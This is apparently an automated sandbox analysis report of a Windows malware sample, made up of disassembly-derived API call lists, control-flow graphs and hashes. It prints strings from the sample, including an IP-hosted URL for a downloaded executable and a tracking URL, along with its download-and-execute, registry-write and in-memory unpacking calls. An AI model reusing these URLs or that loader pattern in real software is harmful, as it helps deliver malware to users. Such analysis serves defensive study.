                                                                      • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                                      • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                                      • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                                      • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                                      • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                                      • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                                      • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                                      • CloseHandle.KERNEL32(?), ref: 00402B89
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                      • String ID: .exe$<$ShareScreen
                                                                      • API String ID: 3323492106-493228180
                                                                      • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                      • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                                      • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                      • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009DA47E
                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 009DA49E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009D9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9d9000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 3833638111-0
                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                      • Instruction ID: 6e97aa2a39c884eabba5665a86e8ad8b3e5ac12bd4a198524c95cb84e228de05
                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                      • Instruction Fuzzy Hash: 5BF0F6351403106FD7203BF9988DB6EB6ECAF48335F10852AE642921D0CBB0EC158A62

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 83 43d095-43d0aa call 42eab6 call 42eac9 77->83 84 43d0ac-43d0f5 call 43cd0a 77->84 85 43d07b-43d082 call 42eac9 78->85 83->85 93 43d162-43d16b GetFileType 84->93 94 43d0f7-43d100 84->94 95 43d35e-43d364 85->95 96 43d1b4-43d1b7 93->96 97 43d16d-43d19e GetLastError call 42ea93 CloseHandle 93->97 99 43d102-43d106 94->99 100 43d137-43d15d GetLastError call 42ea93 94->100 102 43d1c0-43d1c6 96->102 103 43d1b9-43d1be 96->103 97->85 111 43d1a4-43d1af call 42eac9 97->111 99->100 104 43d108-43d135 call 43cd0a 99->104 100->85 108 43d1ca-43d218 call 4396c7 102->108 109 43d1c8 102->109 103->108 104->93 104->100 117 43d21a-43d226 call 43cf1b 108->117 118 43d228-43d24c call 43cabd 108->118 109->108 111->85 117->118 123 43d250-43d25a call 4335cd 117->123 124 43d25f-43d2a2 118->124 125 43d24e 118->125 123->95 127 43d2c3-43d2d1 124->127 128 43d2a4-43d2a8 124->128 125->123 131 43d2d7-43d2db 127->131 132 43d35c 127->132 128->127 130 43d2aa-43d2be 128->130 130->127 131->132 133 43d2dd-43d310 CloseHandle call 43cd0a 131->133 132->95 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->132
                                                                      APIs
                                                                        • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                      • GetLastError.KERNEL32 ref: 0043D150
                                                                      • __dosmaperr.LIBCMT ref: 0043D157
                                                                      • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                                      • GetLastError.KERNEL32 ref: 0043D16D
                                                                      • __dosmaperr.LIBCMT ref: 0043D176
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                                      • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                                      • GetLastError.KERNEL32 ref: 0043D312
                                                                      • __dosmaperr.LIBCMT ref: 0043D319
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                      • String ID: H
                                                                      • API String ID: 4237864984-2852464175
                                                                      • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                      • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                                      • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                      • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 146 432f5b-432f61 143->146 147 4332bd-4332ca call 42eab6 call 42eac9 143->147 158 4332d5 144->158 146->147 150 432f67-432f92 146->150 164 4332d0 call 42a59d 147->164 150->147 153 432f98-432fa1 150->153 156 432fa3-432fb6 call 42eab6 call 42eac9 153->156 157 432fbb-432fbd 153->157 156->164 161 432fc3-432fc7 157->161 162 4332b9-4332bb 157->162 163 4332d8-4332dd 158->163 161->162 166 432fcd-432fd1 161->166 162->163 164->158 166->156 167 432fd3-432fea 166->167 170 433007-433010 167->170 171 432fec-432fef 167->171 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 170->175 176 43302e-433038 170->176 173 432ff1-432ff7 171->173 174 432ff9-433002 171->174 173->174 173->175 177 4330a3-4330bd 174->177 207 4331f0 175->207 179 43303a-43303c 176->179 180 43303f-43305d call 4336a7 call 43346a * 2 176->180 182 4330c3-4330d3 177->182 183 433191-43319a call 43d365 177->183 179->180 211 43307a-4330a0 call 4347ee 180->211 212 43305f-433075 call 42eac9 call 42eab6 180->212 182->183 188 4330d9-4330db 182->188 196 43320d 183->196 197 43319c-4331ae 183->197 188->183 189 4330e1-433107 188->189 189->183 193 43310d-433120 189->193 193->183 198 433122-433124 193->198 200 433211-433229 ReadFile 196->200 197->196 202 4331b0-4331bf GetConsoleMode 197->202 198->183 203 433126-433151 198->203 205 433285-433290 GetLastError 200->205 206 43322b-433231 200->206 202->196 208 4331c1-4331c5 202->208 203->183 210 433153-433166 203->210 213 433292-4332a4 call 42eac9 call 42eab6 205->213 214 4332a9-4332ac 205->214 206->205 215 433233 206->215 209 4331f3-4331fd call 43346a 207->209 208->200 216 4331c7-4331e1 ReadConsoleW 208->216 209->163 210->183 218 433168-43316a 210->218 211->177 212->207 213->207 225 4332b2-4332b4 214->225 226 4331e9-4331ef call 42ea93 214->226 222 433236-433248 215->222 223 4331e3 GetLastError 216->223 224 433202-43320b 216->224 218->183 229 43316c-43318c 218->229 222->209 233 43324a-43324e 222->233 223->226 224->222 225->209 226->207 229->183 237 433250-433260 call 432c45 233->237 238 433267-433272 233->238 247 433263-433265 237->247 239 433274 call 432d95 238->239 240 43327e-433283 call 432a85 238->240 248 433279-43327c 239->248 240->248 247->209 248->247
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                      • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                                      • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                      • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 250 24a003c-24a0047 251 24a0049 250->251 252 24a004c-24a0263 call 24a0a3f call 24a0e0f call 24a0d90 VirtualAlloc 250->252 251->252 267 24a028b-24a0292 252->267 268 24a0265-24a0289 call 24a0a69 252->268 270 24a02a1-24a02b0 267->270 272 24a02ce-24a03c2 VirtualProtect call 24a0cce call 24a0ce7 268->272 270->272 273 24a02b2-24a02cc 270->273 279 24a03d1-24a03e0 272->279 273->270 280 24a0439-24a04b8 VirtualFree 279->280 281 24a03e2-24a0437 call 24a0ce7 279->281 283 24a04be-24a04cd 280->283 284 24a05f4-24a05fe 280->284 281->279 286 24a04d3-24a04dd 283->286 287 24a077f-24a0789 284->287 288 24a0604-24a060d 284->288 286->284 292 24a04e3-24a0505 LoadLibraryA 286->292 290 24a078b-24a07a3 287->290 291 24a07a6-24a07b0 287->291 288->287 293 24a0613-24a0637 288->293 290->291 294 24a086e-24a08be LoadLibraryA 291->294 295 24a07b6-24a07cb 291->295 296 24a0517-24a0520 292->296 297 24a0507-24a0515 292->297 298 24a063e-24a0648 293->298 303 24a08c7-24a08f9 294->303 299 24a07d2-24a07d5 295->299 300 24a0526-24a0547 296->300 297->300 298->287 301 24a064e-24a065a 298->301 304 24a07d7-24a07e0 299->304 305 24a0824-24a0833 299->305 306 24a054d-24a0550 300->306 301->287 302 24a0660-24a066a 301->302 309 24a067a-24a0689 302->309 311 24a08fb-24a0901 303->311 312 24a0902-24a091d 303->312 313 24a07e2 304->313 314 24a07e4-24a0822 304->314 310 24a0839-24a083c 305->310 307 24a05e0-24a05ef 306->307 308 24a0556-24a056b 306->308 307->286 315 24a056f-24a057a 308->315 316 24a056d 308->316 317 24a068f-24a06b2 309->317 318 24a0750-24a077a 309->318 310->294 319 24a083e-24a0847 310->319 311->312 313->305 314->299 320 24a059b-24a05bb 315->320 321 24a057c-24a0599 315->321 316->307 322 24a06ef-24a06fc 317->322 323 24a06b4-24a06ed 317->323 318->298 324 24a084b-24a086c 319->324 325 24a0849 319->325 333 24a05bd-24a05db 320->333 321->333 327 24a074b 322->327 328 24a06fe-24a0748 322->328 323->322 324->310 325->294 327->309 328->327 333->306
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 024A024D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: cess$kernel32.dll
                                                                      • API String ID: 4275171209-1230238691
                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                      • Instruction ID: 47db5edc071913791deb89cbc8230648d4aa3d877f6c379e8469fc357dd10e18
                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                      • Instruction Fuzzy Hash: 3C526974A01229DFDB64CF58C994BADBBB1BF09304F1480DAE94DAB351DB30AA95CF14

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$CloseHandleOpen_wcslen
                                                                      • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                      • API String ID: 3067768807-1501832161
                                                                      • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                      • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                                      • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                      • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                      • String ID:
                                                                      • API String ID: 1687354797-0
                                                                      • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                      • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                                      • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                      • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                                      • __Cnd_signal.LIBCPMT ref: 00405828
                                                                      • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                                      • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                      • String ID:
                                                                      • API String ID: 2059591211-0
                                                                      • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                      • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                                      • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                      • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                      • ExitThread.KERNEL32 ref: 0042DFDA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorExitLastThread
                                                                      • String ID: F(@
                                                                      • API String ID: 1611280651-2698495834
                                                                      • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                      • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                                      • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                      • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 435 42e114-42e11f 436 42e121-42e133 call 42eac9 call 42a59d 435->436 437 42e135-42e148 call 42e0cb 435->437 449 42e185-42e188 436->449 442 42e176 437->442 443 42e14a-42e167 CreateThread 437->443 447 42e178-42e184 call 42e03d 442->447 445 42e189-42e18e 443->445 446 42e169-42e175 GetLastError call 42ea93 443->446 452 42e190-42e193 445->452 453 42e195-42e197 445->453 446->442 447->449 452->453 453->447
                                                                      APIs
                                                                      • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                                      • __dosmaperr.LIBCMT ref: 0042E170
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: CreateErrorLastThread__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 2744730728-0
                                                                      • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                      • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                                      • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                      • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 462 4347a7-4347b1 459->462 463 434798-4347a5 GetLastError call 42ea93 459->463 467 43477a-43477e 460->467 466 4347b3-4347c8 462->466 462->467 463->467 468 4347cd-4347d2 466->468 467->468
                                                                      APIs
                                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
                                                                      • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                                      • __dosmaperr.LIBCMT ref: 0043479F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 2336955059-0
                                                                      • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                      • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                                      • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                      • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
                                                                      APIs
                                                                      • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
                                                                      • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateValue
                                                                      • String ID:
                                                                      • API String ID: 1818849710-0
                                                                      • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                      • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                                      • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                      • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 475 42e074-42e081 call 431f5e 478 42e083-42e086 ExitThread 475->478 479 42e08c-42e094 475->479 479->478 480 42e096-42e09a 479->480 481 42e0a1-42e0a7 480->481 482 42e09c call 4354f6 480->482 484 42e0b4-42e0ba 481->484 485 42e0a9-42e0ab 481->485 482->481 484->478 487 42e0bc-42e0be 484->487 485->484 486 42e0ad-42e0ae CloseHandle 485->486 486->484 487->478 488 42e0c0-42e0ca FreeLibraryAndExitThread 487->488
                                                                      APIs
                                                                        • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                        • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                                        • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                      • ExitThread.KERNEL32 ref: 0042E086
                                                                      • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                                      • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                      • String ID:
                                                                      • API String ID: 1198197534-0
                                                                      • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                      • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                                      • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                      • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 489 40239e-4023ac 490 402561-402563 PostQuitMessage 489->490 491 4023b2-4023b7 489->491 492 402569-40256e 490->492 493 4023d0-4023d7 491->493 494 4023b9-4023cb DefWindowProcW 491->494 495 4023d9 call 401da4 493->495 496 4023de-4023e5 493->496 494->492 495->496 496->492 498 4023eb-40255f call 4010ba call 4029f4 496->498 498->492
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                                      • PostQuitMessage.USER32(00000000), ref: 00402563
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostProcQuitWindow
                                                                      • String ID:
                                                                      • API String ID: 3873111417-0
                                                                      • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                      • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                                      • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                      • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 503 40155a-4016d0 Sleep call 4010ba 505 4016d5-4016d9 503->505
                                                                      APIs
                                                                      • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Sleep
                                                                      • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                      • API String ID: 3358372957-3120454669
                                                                      • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                      • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                                      • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                      • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 0040298F
                                                                      • __fassign.LIBCMT ref: 0040299F
                                                                        • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                      • String ID:
                                                                      • API String ID: 2843524283-0
                                                                      • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                      • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                                      • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                      • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000400,?,?,024A0223,?,?), ref: 024A0E19
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,024A0223,?,?), ref: 024A0E1E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
